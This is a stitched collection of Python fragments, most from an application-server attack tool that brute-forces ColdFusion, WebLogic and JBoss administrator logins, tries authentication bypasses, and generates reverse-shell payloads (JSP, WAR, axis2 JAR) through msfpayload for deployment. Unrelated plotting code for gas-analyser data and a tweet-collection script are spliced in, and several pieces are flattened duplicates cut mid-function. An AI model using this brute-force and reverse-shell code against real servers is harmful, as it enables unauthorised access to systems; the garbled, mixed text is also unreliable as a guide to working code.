                    stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \
                                 % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                    cook = _auth(state.bf_user, word, url, version)
                    if cook:
                        print('')  # newline

                        # lets insert these credentials to the default list so we
                        # don't need to bruteforce it each time
                        if not (state.bf_user, word) in default_credentials:
                            default_credentials.insert(0, (state.bf_user, word))

                        # NOTE(review): the password goes to utility.Msg in
                        # clear text, so whatever that writes to holds it.
                        utility.Msg(
                            "Successful login %s:%s" % (state.bf_user, word),
                            LOG.SUCCESS)
                        return cook

                print('')

            except KeyboardInterrupt:
                # Ctrl-C ends the wordlist pass; the function returns None.
                pass
# exploitation engine for the service utility.Msg("Loading auxiliary for '%s'..." % fingerengine.service, LOG.DEBUG) # execute the auxiliary engine auxengine(fingerengine) if __name__ == "__main__": utility.header() options = parse(sys.argv[1:]) # set platform state.platform = platform.system().lower() utility.Msg("Started at %s" % (utility.timestamp())) # log the CLI args utility.log(' '.join(sys.argv)) try: prerun(options) if options.ip or options.input_list: run(options) postrun(options) except KeyboardInterrupt: pass utility.Msg("Finished at %s" % (utility.timestamp()))
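def rga_plot(filepath, **kwargs):
    """Plot RGA partial-pressure traces from *filepath* against time.

    Keyword arguments:
        chan2plot: 'all' (every species returned by rga_read), 'AllXenon'
            (the four xenon channels) or a list of species names.
        bounds: 'full' or a pair of time strings converted with
            ``ut.timestamp``.
        yscale: 'linear' (default) or 'log'.
        colors: starting line colour; species in the built-in table override
            it, and a species outside the table keeps the previous colour.
        date: passed to rga_read; 'same' makes the title use the
            module-level ``date_g``.
        tag, overlay, style: accepted by callers but not used here.

    Changes from the original: the file is read once instead of twice, and
    the hand-written nearest-index loop is gone. Its result was never used
    and it could raise on an unbound ``last_time``.

    NOTE(review): block nesting was reconstructed from a flattened listing;
    in particular ``ut.bound_finder`` is assumed to run only when bounds is
    not 'full'. Confirm against the original file.
    """
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut

    chan2plot = kwargs.get('chan2plot', 'all')
    bounds = kwargs.get('bounds', 'full')
    yscale = kwargs.get('yscale', 'linear')
    col = kwargs.get('colors', 'default')
    date2 = kwargs.get('date', 'same')
    date = date_g if date2 == 'same' else date2

    species, p_data = rga_read(filepath, date=date2)

    # Column 0 is time, the remaining columns are one per species.
    time = p_data[:, 0]
    p_data = p_data[:, 1:]
    # NOTE(review): result unused; the call is kept because the helper's
    # behaviour is not visible from here.
    dt = ut.avediff(time)

    if bounds == 'full':
        bound_i = [0, len(time) - 1]
    else:
        bound_i = ut.bound_finder(time, ut.timestamp(bounds))
    first, last = bound_i[0], bound_i[1]

    if chan2plot == 'all':
        chan2plot = species
    if chan2plot == 'AllXenon':
        chan2plot = ['Xenon129', 'Xenon131', 'Xenon132', 'Xenon134']

    species_colours = {
        'Nitrogen': 'FireBrick',
        'Oxygen': 'Turquoise',
        'Hydrogen': 'Goldenrod',
        'CarbonDioxide': 'DarkGreen',
        'Water': 'MidnightBlue',
        'Xenon129': 'Violet',
        'Xenon131': 'DarkViolet',
        'Xenon132': 'DarkMagenta',
        'Xenon134': 'DarkSlateBlue',
        'Argon': 'DeepPink',
        'mass83': 'DodgerBlue',
        'Barium138': 'DodgerBlue',
    }

    plt.figure('rga_plot')
    plt.clf()
    for name in chan2plot:
        # Unknown species keep whatever colour is current, as before.
        col = species_colours.get(name, col)
        plt.plot(time[first:last],
                 p_data[first:last, species.index(name)],
                 color=col,
                 label=name)

    plt.xlim(time[first], time[last])
    if yscale == 'log':
        ut.log()
    if yscale == 'linear':
        ut.sci()
    plt.xlabel('Time (s)')
    plt.ylabel('Partial Pressure (Torr)')
    plt.title(str(date) + ' pvt' + str(filepath))
    plt.legend(fontsize=12)
    plt.show()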
utility.Msg("Fingerprinting completed.", LOG.UPDATE) # We've got the host fingerprinted, now kick off the # exploitation engine for the service utility.Msg("Loading auxiliary for '%s'..." % fingerengine.service, LOG.DEBUG) # execute the auxiliary engine auxengine(fingerengine) if __name__ == "__main__": utility.header() options = parse(sys.argv[1:]) utility.Msg("Started at %s" % (utility.timestamp())) # log the CLI args utility.log(' '.join(sys.argv)) try: prerun(options) if options.ip or options.input_list: run(options) postrun(options) except KeyboardInterrupt: pass utility.Msg("Finished at %s" % (utility.timestamp()))
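def rga_int(filepath, bounds, **kwargs):
    """Integrate RGA partial-pressure channels over a time window and plot them.

    Args:
        filepath: file handed to ``rga_read``.
        bounds: pair of times; strings are converted with ``ut.timestamp``.

    Keyword arguments:
        chan2int: 'all', 'AllXenon' or a list of species names.
        yscale: 'log' (default) or 'linear'.
        colors: starting line colour; species in the built-in table override
            it, and a species outside the table keeps the previous colour.
        store: when true, the list of integrals is returned.
        plt_sub: when true, the plotted traces have the background removed.
        boundtype: 'edge' (default) or 'front', where bounds[1] is a
            duration added to bounds[0].

    Returns:
        The list of integrals when ``store`` is true, otherwise None.

    Changes from the original: window indices are clamped to the data, so a
    window close to the start no longer wraps to the end of the array
    through a negative index and the x-limits cannot index past the last
    sample.

    NOTE(review): block nesting was reconstructed from a flattened listing;
    confirm it against the original file.
    """
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut

    chan2int = kwargs.get('chan2int', 'all')
    yscale = kwargs.get('yscale', 'log')
    col = kwargs.get('colors', 'default')
    output = kwargs.get('store', False)
    pltsub = kwargs.get('plt_sub', False)
    bndtype = kwargs.get('boundtype', 'edge')

    species, p_data = rga_read(filepath)

    # Column 0 is time, the remaining columns are one per species.
    time = p_data[:, 0]
    p_data = p_data[:, 1:]
    # NOTE(review): result unused; the call is kept because the helper's
    # behaviour is not visible from here.
    dt = ut.avediff(time)

    if isinstance(bounds[0], str):
        bounds = ut.timestamp(bounds)
    if bndtype == 'front':
        bounds = [bounds[0], bounds[0] + bounds[1]]

    bound_i = ut.bound_finder(time, bounds)
    lo, hi = bound_i[0], bound_i[1]
    last = len(time) - 1

    if chan2int == 'all':
        chan2int = species
    if chan2int == 'AllXenon':
        chan2int = ['Xenon129', 'Xenon131', 'Xenon132', 'Xenon134']

    # Background is the mean of up to 20 samples just before the window.
    # NOTE(review): it is subtracted once from the sum rather than once per
    # sample - confirm that is intended.
    bg_start = max(lo - 20, 0)
    ints, bg = [], []
    for name in chan2int:
        column = species.index(name)
        bg.append(np.mean(p_data[bg_start:lo, column]))
        ints.append(np.sum(p_data[lo:hi, column]) - bg[-1])

    species_colours = {
        'Nitrogen': 'FireBrick',
        'Oxygen': 'Turquoise',
        'Hydrogen': 'Goldenrod',
        'CarbonDioxide': 'DarkGreen',
        'Water': 'MidnightBlue',
        'Xenon129': 'Violet',
        'Xenon131': 'DarkViolet',
        'Xenon132': 'DarkMagenta',
        'Xenon134': 'DarkSlateBlue',
        'Argon': 'DeepPink',
        'mass83': 'DodgerBlue',
    }

    plt.figure('rga_int')
    plt.clf()
    view = slice(max(lo - 10, 0), hi + 10)  # ten samples of margin each side
    figlines = []
    for j, name in enumerate(chan2int):
        col = species_colours.get(name, col)
        trace = p_data[view, species.index(name)]
        if pltsub:
            trace = trace - bg[j]
        plt.plot(time[view], trace, color=col, label=name)
        figlines.append(name + ': ' + ut.conv(ints[j]) + 'Torr')
    figtext = '\n'.join(figlines)

    plt.xlim(time[max(lo - 5, 0)], time[min(hi + 5, last)])
    plt.axvline(bounds[0], color='black', ls='--')
    plt.axvline(bounds[1], color='black', ls='--')
    if yscale == 'log':
        ut.log()
    if yscale == 'linear':
        ut.sci()
    plt.xlabel('Time (s)')
    plt.ylabel('Partial Pressure (Torr)')
    # NOTE(review): `date` is not defined in this function; it has to exist
    # at module level or this line raises NameError.
    plt.title(str(date) + ' RGA integral')
    ut.textbox(figtext, [.05, .95])
    plt.legend()
    plt.show()

    if output:
        return ints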
def checkAuth(ip, fingerprint, returnCookie = False): """ Default behavior is to simply return True/False based on whether or not authentication with the credentials was successful. If returnCookie is set to true, we return the required auth cookie. Returns a tuple of (usr, pswd) in the event of a success, otherwise (None, None) is returned. """ # check with given auth if state.usr_auth: (usr, pswd) = state.usr_auth.split(':') auth = _auth(usr, pswd, ip, fingerprint) if auth: return auth # else try default credentials for (usr, pswd) in default_credentials: auth = _auth(usr, pswd, ip, fingerprint) if auth: return auth # if we're still here, lets check for a wordlist if state.bf_wordlist and not state.hasbf: # # by default, certain WebLogic servers have a lockout of 5 attempts # before a 30 minute lock. Lets confirm the user knows this. # tmp = utility.capture_input("WebLogic has a lockout after 5 attempts. Continue? [Y/n]") if 'n' in tmp: return (None, None) state.hasbf = True wordlist = [] try: with open(state.bf_wordlist, 'r') as f: wordlist = [x.decode('ascii', "ignore").rstrip() for x in f.readlines()] except Exception, e: utility.Msg(e, LOG.DEBUG) return (None, None) utility.Msg('Brute forcing %s account with %d passwords...' % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \ % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) auth = _auth(state.bf_user, word, ip, fingerprint) if auth: print '' # insert creds into default cred list if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg("Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS) return auth print '' except KeyboardInterrupt: pass
def checkAuth(ip, port, title, version):
    """Look for a working session on the administrator login at ip:port.

    The login URL depends on *version*. With state.usr_auth set, a value of
    40 or more characters is first passed to attemptPTH() on versions 7.0,
    8.0 and 9.0, then used as "user:password", or as the password for
    "admin" when it has no ':'. Without it the order is default_credentials,
    attemptRDS() on 9.0, then each line of the file named by
    state.bf_wordlist for state.bf_user. Returns the first truthy result,
    otherwise None. *title* is not read here.

    Python 2 syntax (print statement, "except Exception, e").
    """

    # Plain http:// - credentials travel unencrypted to the target.
    url = "http://{0}:{1}/CFIDE/administrator/enter.cfm".format(ip, port)
    if version in ['5.0']:
        url = 'http://{0}:{1}/CFIDE/administrator/index.cfm'.format(ip, port)

    # check with given auth
    if state.usr_auth:
        if version in ['7.0', '8.0', '9.0'] and len(state.usr_auth) >= 40:
            # try pth
            cook = attemptPTH(url, state.usr_auth)
            if cook:
                return cook

        if ':' in state.usr_auth:
            # Raises ValueError when the value holds more than one ':'.
            (usr, pswd) = state.usr_auth.split(':')
        else:
            (usr, pswd) = "admin", state.usr_auth
        return _auth(usr, pswd, url, version)

    # else try default creds
    for (usr, pswd) in default_credentials:
        cook = _auth(usr, pswd, url, version)
        if cook:
            return cook

    # if we're 9.x, we can use the RDS bypass
    if version in ["9.0"]:
        cook = attemptRDS(ip, port)
        if cook:
            return cook

    # if we're still here, check if they supplied a wordlist
    if state.bf_wordlist and not state.hasbf:

        # Set before the loop, so the wordlist pass is not repeated while
        # this flag stays set.
        state.hasbf = True
        wordlist = []

        try:
            with open(state.bf_wordlist, 'r') as f:
                # ensure everything is ascii or requests will explode
                wordlist = [
                    x.decode('ascii', 'ignore').rstrip() for x in f.readlines()
                ]
        except Exception, e:
            # An unreadable wordlist is reported and the function returns None.
            utility.Msg("Failed to read wordlist (%s)" % e, LOG.ERROR)
            return

        utility.Msg(
            "Brute forcing account %s with %d passwords..." %
            (state.bf_user, len(wordlist)), LOG.DEBUG)

        try:
            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
                             % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                cook = _auth(state.bf_user, word, url, version)
                if cook:
                    print ''  # newline

                    # Cache the pair at the front of the shared list.
                    if not (state.bf_user, word) in default_credentials:
                        default_credentials.insert(0, (state.bf_user, word))

                    # NOTE(review): the password goes to utility.Msg in clear
                    # text, so whatever that writes to holds it.
                    utility.Msg(
                        "Successful login %s:%s" % (state.bf_user, word),
                        LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C ends the wordlist pass; the function returns None.
            pass
def run(options):
    """ This module is used for generating reverse shell payloads.  It's not
    flexible in what sorts of payloads it can generate, but this is by design.

    Highly customized payloads, or stuff like meterpreter/reverse java payloads
    should be generated using proper tools, such as msfpayload.  This is merely
    a quick way for us to get a reverse shell on a remote system.

    Reads options.remote_service, options.remote_os and
    options.generate_payload ("host:port").  The work is done by the external
    msfpayload binary through a shell; the function returns None in every
    case and reports through utility.Msg.

    Files written, all relative to the current working directory:
    shell.jsp, shell.jar or shell.war (by the shell redirect), and
    ./src/lib/shell.log with the generation time, host:port and payload name.
    """

    # defaults; overridden below for axis2 and for non-windows targets
    PAYLOAD = "java/jsp_shell_reverse_tcp"
    SHELL = "cmd.exe"

    # `out` is the tail of the msfpayload command line: an output-format
    # letter followed by a shell redirect into the output file
    if not options.remote_service:
        utility.Msg("Please specify a remote service (-a)", LOG.ERROR)
        return
    elif not options.remote_os:
        utility.Msg("Please specify a remote OS (-o)", LOG.ERROR)
        return
    elif options.remote_service in ["coldfusion"]:
        out = "R > shell.jsp"
    elif options.remote_service in ["axis2"]:
        PAYLOAD = "java/meterpreter/reverse_tcp"
        out = "R > shell.jar"
    else:
        out = "W > shell.war"

    if options.remote_os != "windows":
        SHELL = "/bin/bash"

    # an empty `which` result is taken to mean the binary is not on PATH
    if getoutput("which msfpayload") == "":
        utility.Msg("This option requires msfpayload", LOG.ERROR)
        return

    utility.Msg("Generating payload....")
    # NOTE(review): raises ValueError unless the value holds exactly one ':'
    (lhost, lport) = options.generate_payload.split(":")

    # NOTE(review): lhost and lport are interpolated unquoted into a command
    # line that getoutput() hands to a shell; they are not validated here.
    resp = getoutput("msfpayload %s LHOST=%s LPORT=%s SHELL=%s %s" %
                    (PAYLOAD, lhost, lport, SHELL, out))

    '''For axis2 payloads, we have to add a few things to the msfpayload output'''
    # this append happens before the success check on `resp` further down
    if (options.remote_service in ["axis2"]):
        services_xml = """<service name="shell" scope="application"> <description> Clusterd axis2 service </description> <messageReceivers> <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-only" class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/> <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/> </messageReceivers> <parameter name="ServiceClass"> metasploit.PayloadServlet </parameter> </service>"""

        # mode 'a' adds the servlet class and the service descriptor to the
        # archive that the redirect above wrote
        with ZipFile('shell.jar', 'a') as shellZip:
            shellZip.write("./src/lib/axis2/PayloadServlet.class", "metasploit/PayloadServlet.class")
            shellZip.writestr("META-INF/services.xml", services_xml)

    # success heuristic: (almost) no output, or output containing 'Created by'
    if len(resp) <= 1 or 'Created by' in resp:
        # out.split(' ')[2] is the file name after the redirect
        utility.Msg("Payload generated (%s).  Payload: %s" % (out.split(' ')[2], PAYLOAD))

        # also log some auxiliary information
        # the first echo truncates shell.log ('>'), the next two append ('>>');
        # all three go through a shell with unquoted values
        getoutput("echo Generated at %s > ./src/lib/shell.log" % utility.timestamp())
        getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport))
        getoutput("echo %s >> ./src/lib/shell.log" % (PAYLOAD))
    else:
        utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
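def parse(arguments):
    """ Parse command line options

    Builds the argparse parser (connection, remote host, deploy, one group
    per entry of state.supported_platforms, miscellaneous), parses
    `arguments`, copies the global settings into `state` and returns the
    parsed namespace.  Prints the help text and exits with status 1 when
    sys.argv holds no arguments.

    Changes against the previous version: the user-agent list is read inside
    a `with` block so the file handle is closed, and only a malformed timeout
    value (TypeError/ValueError) is tolerated instead of every exception.
    """
    parser = ArgumentParser(usage='./clusterd.py [options]')

    #
    # Connection related command line arguments
    #
    connection = parser.add_argument_group(
        "Connection", description='Options for configuring the connection')
    connection.add_argument("-i", help='Server address', action='store',
                            dest='ip', metavar='[ip address]')
    connection.add_argument("-iL", help='Server list', action='store',
                            dest='input_list', metavar='[file]')
    connection.add_argument('-p', help='Server port', action='store',
                            dest='port', type=int, metavar='[port]')
    connection.add_argument('--proxy', help='Connect through proxy [http|https]',
                            action='store', dest='proxy',
                            metavar="[proxy://server:port]")
    # NOTE(review): credentials given on the command line (--proxy-auth,
    # --usr-auth) are visible in the process list and the shell history.
    connection.add_argument('--proxy-auth', help='Proxy credentials',
                            action='store', dest='proxy_auth',
                            metavar='[username:password]')
    connection.add_argument('--timeout',
                            help='Connection timeout [%ds]' % state.timeout,
                            action='store', dest='timeout',
                            default=state.timeout, metavar='[seconds]')
    connection.add_argument("--random-agent",
                            help='Use a random User-Agent for requests',
                            action='store_true', dest='random_agent',
                            default=False)
    connection.add_argument("--ssl", help='Force SSL', action='store_true',
                            dest='ssl', default=False)

    #
    # Remote host command line arguments
    #
    remote = parser.add_argument_group(
        'Remote Host', description='Settings specific to the remote host')
    remote.add_argument('-a', help='Hint at remote host service',
                        action='store', dest='remote_service',
                        metavar='[%s]' % ('|'.join(state.supported_platforms)))
    remote.add_argument('-o', help='Hint at remote host OS', action='store',
                        dest='remote_os', metavar='[windows|linux]',
                        default='windows')
    remote.add_argument('-v', help='Specific version to test', action='store',
                        dest='version', metavar='[version]', default=None)
    remote.add_argument('--usr-auth', help='Login credentials for service',
                        action='store', dest='usr_auth',
                        metavar='[username:password]')
    remote.add_argument('--fingerprint', help='Fingerprint the remote system',
                        action='store_true', dest='fp', default=False)
    remote.add_argument("--arch", help='Specify remote OS architecture',
                        action='store', dest='arch', default='x86',
                        metavar='[x86|x64]')
    remote.add_argument("--delay", help='Delay N seconds between each attempt',
                        action='store', dest='delay', default=None,
                        metavar='[seconds]')

    #
    # deploy options
    #
    deploy = parser.add_argument_group(
        "Deploy", description='Deployment flags and settings')
    deploy.add_argument("--deploy", help='Deploy to the discovered service',
                        action='store', dest='deploy', metavar='[file]')
    deploy.add_argument("--undeploy", help='Undeploy file from server',
                        action='store', dest='undeploy', metavar='[context]')
    deploy.add_argument("--deployer", help="Specify a deployer to use",
                        action='store', dest='deployer', default=None,
                        metavar='[deployer]')
    deploy.add_argument("--invoke", help="Invoke payload after deployment",
                        action='store_true', dest='invoke_payload',
                        default=False)
    deploy.add_argument("--rand-payload",
                        help='Use a random name for the deployed file',
                        action='store_true', dest='rand_payload', default=None)
    deploy.add_argument("-b", help="Brute force credentials for user [admin]",
                        action='store', dest='bf_user', metavar='[user]',
                        default='admin')
    deploy.add_argument('--wordlist',
                        help='Wordlist for brute forcing passwords',
                        action='store', dest='wordlist', default=None,
                        metavar='[path]')

    #
    # iterate over our supported platforms and build their
    # auxiliary modules
    #
    for platform in state.supported_platforms:
        group = parser.add_argument_group(platform + " modules")
        group = build_platform_flags(platform, group)

    other = parser.add_argument_group("Other",
                                      description='Miscellaneous flags')
    # const/nargs='?': the bare flag yields 'All', an optional value narrows it
    other.add_argument("--deployer-list", help="List all available deployers",
                       action='store', dest='deploy_list', const='All',
                       nargs='?', metavar='platform')
    other.add_argument("--aux-list", help="List all available exploits",
                       action='store', dest='aux_list', const='All',
                       nargs='?', metavar='platform')
    other.add_argument("--gen-payload", help='Generate a reverse shell payload',
                       action='store', dest='generate_payload',
                       metavar='[host:port] for reverse connection')
    other.add_argument("--discover",
                       help="Attempt to discover application servers using the specified nmap gnmap output (use -sV when scanning)",
                       action="store", dest='discovery_file',
                       metavar='[discovery_file]')
    other.add_argument("--listen", help='Adapter to listen on when needed',
                       action='store', dest='listener', metavar='[adapter]',
                       default=None)
    other.add_argument("-d", help='Enable debug output', action='store_true',
                       dest='debug', default=False)
    other.add_argument("-l", help='Log output to file [$time$_log.log]',
                       dest='flog', action='store_true', default=False)

    # parse cli options
    options = parser.parse_args(arguments)

    # the check looks at sys.argv, not at `arguments`
    if len(sys.argv) <= 1:
        parser.print_help()
        sys.exit(1)

    #
    # Setup state variables from given flags
    #
    if options.proxy:
        state.proxy = options.proxy

    if options.proxy_auth:
        state.proxy_auth = options.proxy_auth

    if options.debug:
        state.isdebug = True

    if options.usr_auth:
        state.usr_auth = options.usr_auth

    if options.wordlist:
        state.bf_wordlist = options.wordlist

    if options.random_agent:
        # select a random user-agent from the list; the with block closes the
        # file instead of leaving the handle to the garbage collector
        with open('./src/lib/user-agents.txt') as agents:
            state.random_agent = choice(list(agents)).rstrip()
        utility.Msg("Random user agent '%s' selected" % (state.random_agent),
                    LOG.DEBUG)

    if options.listener:
        state.listener = options.listener

    state.ssl = options.ssl
    state.bf_user = options.bf_user
    state.flog = ("%s_log.log" % utility.timestamp().replace(' ', '_')
                  if options.flog else None)

    try:
        state.timeout = float(options.timeout)
    except (TypeError, ValueError):
        # state.timeout keeps its previous value; Ctrl-C and other unrelated
        # exceptions are no longer swallowed here
        utility.Msg("Timeout value must be an integer.  Defaulting to %d." %
                    state.timeout, LOG.ERROR)

    return options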
def checkAuth(ip, port, title, version):
    """ Try to authenticate against the interface named by `title`.

    For versions 5.1/6.0/6.1 with title JINTERFACES.WM every pair in
    default_credentials is posted to /admin-console/login.seam; the first
    response with status 200 yields (cookie dict, None).

    For the JMX, MM and WC interfaces the order is: state.usr_auth (its
    _auth() result is returned as is), then default_credentials, then each
    line of the state.bf_wordlist file as a password for state.bf_user,
    unless state.hasbf is already set.  Any other title is logged as
    unsupported.

    Returns None when nothing succeeded.

    NOTE(review): the nesting was reconstructed from a flattened listing;
    the wordlist stage is assumed to belong to the else branch, where `url`
    is always bound -- confirm against the original file.
    """

    if version in ["5.1", "6.0", "6.1"] and title is JINTERFACES.WM:
        # state.usr_auth is not consulted in this branch
        for (usr, pswd) in default_credentials:
            url = "http://%s:%s/admin-console/login.seam" % (ip, port)
            # the view state is fetched again for every pair
            data = OrderedDict([
                    ("login_form", "login_form"),
                    ("login_form:name", usr),
                    ("login_form:password", pswd),
                    ("login_form:submit", "Login"),
                    ("javax.faces.ViewState", utility.fetch_viewState(url)),
                   ])

            response = utility.requests_post(url, data=data)
            # a 200 status is treated as a successful login
            if response.status_code == 200:
                utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd), LOG.DEBUG)
                if version in ["5.1"]:
                    # 5.1 takes the cookies from the first entry of the
                    # response history rather than from the final response
                    return (dict_from_cookiejar(response.history[0].cookies), None)
                return (dict_from_cookiejar(response.cookies), None)

    else:
        # `is` compares identity with the JINTERFACES members
        if title is JINTERFACES.JMX:
            url = "http://%s:%s/jmx-console/" % (ip, port)
        elif title is JINTERFACES.MM:
            url = "http://%s:%s/management" % (ip, port)
        elif title is JINTERFACES.WC:
            url = "http://%s:%s/web-console" % (ip, port)
        else:
            utility.Msg("Unsupported auth interface: %s" % title, LOG.DEBUG)
            return

        # check with given auth
        if state.usr_auth:
            # NOTE(review): a value with more or fewer than one ':' raises
            # ValueError on this unpacking
            (usr, pswd) = state.usr_auth.split(':')
            return _auth(usr, pswd, url, version)

        # else try default credentials
        for (usr, pswd) in default_credentials:
            cook = _auth(usr, pswd, url, version)
            if cook:
                return cook

        # if we're still here, check if they supplied a wordlist
        if state.bf_wordlist and not state.hasbf:

            state.hasbf = True
            wordlist = []
            # unlike the read in the other checkAuth variants on this page,
            # a failing open() is not caught here
            with open(state.bf_wordlist, 'r') as f:
                # ensure everything is ascii or requests will explode
                wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]

            utility.Msg("Brute forcing %s account with %d passwords..." %
                                        (state.bf_user, len(wordlist)), LOG.DEBUG)

            try:
                for (idx, word) in enumerate(wordlist):
                    stdout.flush()
                    stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \
                                    % (utility.timestamp(), state.bf_user,
                                       idx+1, len(wordlist)))

                    cook = _auth(state.bf_user, word, url, version)
                    if cook:
                        print '' # newline

                        # lets insert these credentials to the default list so we
                        # don't need to bruteforce it each time
                        if not (state.bf_user, word) in default_credentials:
                            default_credentials.insert(0, (state.bf_user, word))

                        # the cleartext password goes to the tool's output
                        utility.Msg("Successful login %s:%s" % (state.bf_user, word),
                                                                LOG.SUCCESS)
                        return cook

                print ''

            except KeyboardInterrupt:
                # Ctrl-C ends the wordlist run; the function then returns None
                pass
from datetime import datetime
import json
from os import rename

import lib
from s3 import create_boto_client, process_local_file_to_S3
from twitter_funcs import collect_tweets, create_tweet_iterator
from mongo import create_mongo_client_to_database_collection, insert_to_mongo
from utility import get_credentials, timestamp, write_to_disk
from requests import HTTPError

if __name__ == "__main__":
    # Collector loop: pull tweets in batches of 100, write each batch to a
    # local file, then hand that file to S3 and to MongoDB.

    credentials = get_credentials()
    twitter_token = credentials['twitter']['token']

    # The secrets come from credentials.json (see the message below); a
    # missing token stops the script before any client is created.
    # NOTE(review): HTTPError is raised although no HTTP exchange took place.
    if twitter_token is None:
        print(
            "Did you forget to add your twitter tokens to the credentials.json file?"
        )
        raise HTTPError

    tweet_stream = create_tweet_iterator()
    s3 = create_boto_client()
    mongo_collection = create_mongo_client_to_database_collection()

    # runs until the process is stopped or one of the calls raises
    while True:
        timestamp()
        batch = collect_tweets(tweet_stream, 100)
        batch_path = write_to_disk(batch)
        process_local_file_to_S3(s3, batch_path)
        insert_to_mongo(s3, mongo_collection, batch_path)
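def parse(arguments):
    """ Parse command line options

    Builds the argparse parser (connection, remote host, deploy, one group
    per entry of state.supported_platforms, miscellaneous), parses
    `arguments`, copies the global settings into `state` and returns the
    parsed namespace.  Prints the help text and exits with status 1 when
    sys.argv holds no arguments.

    Changes against the previous version: the user-agent list is read inside
    a `with` block so the file handle is closed, and only a malformed timeout
    value (TypeError/ValueError) is tolerated instead of every exception.
    """
    parser = ArgumentParser(usage='./clusterd.py [options]')

    #
    # Connection related command line arguments
    #
    connection = parser.add_argument_group(
        "Connection", description='Options for configuring the connection')
    connection.add_argument("-i", help='Server address', action='store',
                            dest='ip', metavar='[ip address]')
    connection.add_argument("-iL", help='Server list', action='store',
                            dest='input_list', metavar='[file]')
    connection.add_argument('-p', help='Server port', action='store',
                            dest='port', type=int, metavar='[port]')
    connection.add_argument('--proxy', help='Connect through proxy [http|https]',
                            action='store', dest='proxy',
                            metavar="[proxy://server:port]")
    # NOTE(review): credentials given on the command line (--proxy-auth,
    # --usr-auth) are visible in the process list and the shell history.
    connection.add_argument('--proxy-auth', help='Proxy credentials',
                            action='store', dest='proxy_auth',
                            metavar='[username:password]')
    connection.add_argument('--timeout',
                            help='Connection timeout [%ds]' % state.timeout,
                            action='store', dest='timeout',
                            default=state.timeout, metavar='[seconds]')
    connection.add_argument("--random-agent",
                            help='Use a random User-Agent for requests',
                            action='store_true', dest='random_agent',
                            default=False)
    connection.add_argument("--ssl", help='Force SSL', action='store_true',
                            dest='ssl', default=False)

    #
    # Remote host command line arguments
    #
    remote = parser.add_argument_group(
        'Remote Host', description='Settings specific to the remote host')
    remote.add_argument('-a', help='Hint at remote host service',
                        action='store', dest='remote_service',
                        metavar='[%s]' % ('|'.join(state.supported_platforms)))
    remote.add_argument('-o', help='Hint at remote host OS', action='store',
                        dest='remote_os', metavar='[windows|linux]',
                        default='windows')
    remote.add_argument('-v', help='Specific version to test', action='store',
                        dest='version', metavar='[version]', default=None)
    remote.add_argument('--usr-auth', help='Login credentials for service',
                        action='store', dest='usr_auth',
                        metavar='[username:password]')
    remote.add_argument('--fingerprint', help='Fingerprint the remote system',
                        action='store_true', dest='fp', default=False)
    remote.add_argument("--arch", help='Specify remote OS architecture',
                        action='store', dest='arch', default='x86',
                        metavar='[x86|x64]')

    #
    # deploy options
    #
    deploy = parser.add_argument_group(
        "Deploy", description='Deployment flags and settings')
    deploy.add_argument("--deploy", help='Deploy to the discovered service',
                        action='store', dest='deploy', metavar='[file]')
    deploy.add_argument("--undeploy", help='Undeploy file from server',
                        action='store', dest='undeploy', metavar='[context]')
    deploy.add_argument("--deployer", help="Specify a deployer to use",
                        action='store', dest='deployer', default=None,
                        metavar='[deployer]')
    deploy.add_argument("--invoke", help="Invoke payload after deployment",
                        action='store_true', dest='invoke_payload',
                        default=False)
    deploy.add_argument("--rand-payload",
                        help='Use a random name for the deployed file',
                        action='store_true', dest='rand_payload', default=None)
    deploy.add_argument("-b", help="Brute force credentials for user [admin]",
                        action='store', dest='bf_user', metavar='[user]',
                        default='admin')
    deploy.add_argument('--wordlist',
                        help='Wordlist for brute forcing passwords',
                        action='store', dest='wordlist', default=None,
                        metavar='[path]')

    #
    # iterate over our supported platforms and build their
    # auxiliary modules
    #
    for platform in state.supported_platforms:
        group = parser.add_argument_group(platform + " modules")
        group = build_platform_flags(platform, group)

    other = parser.add_argument_group("Other",
                                      description='Miscellaneous flags')
    other.add_argument("--deployer-list", help="List all available deployers",
                       action='store_true', dest='deploy_list', default=False)
    other.add_argument("--aux-list", help="List all available exploits",
                       action='store_true', dest='aux_list', default=False)
    other.add_argument("--gen-payload", help='Generate a reverse shell payload',
                       action='store', dest='generate_payload',
                       metavar='[host:port] for reverse connection')
    other.add_argument("--discover",
                       help="Attempt to discover application servers using the specified nmap gnmap output (use -sV when scanning)",
                       action="store", dest='discovery_file',
                       metavar='[discovery_file]')
    other.add_argument("--listen", help='Adapter to listen on when needed',
                       action='store', dest='listener', metavar='[adapter]',
                       default=None)
    other.add_argument("-d", help='Enable debug output', action='store_true',
                       dest='debug', default=False)
    other.add_argument("-l", help='Log output to file [$time$_log.log]',
                       dest='flog', action='store_true', default=False)

    # parse cli options
    options = parser.parse_args(arguments)

    # the check looks at sys.argv, not at `arguments`
    if len(sys.argv) <= 1:
        parser.print_help()
        sys.exit(1)

    #
    # Setup state variables from given flags
    #
    if options.proxy:
        state.proxy = options.proxy

    if options.proxy_auth:
        state.proxy_auth = options.proxy_auth

    if options.debug:
        state.isdebug = True

    if options.usr_auth:
        state.usr_auth = options.usr_auth

    if options.wordlist:
        state.bf_wordlist = options.wordlist

    if options.random_agent:
        # select a random user-agent from the list; the with block closes the
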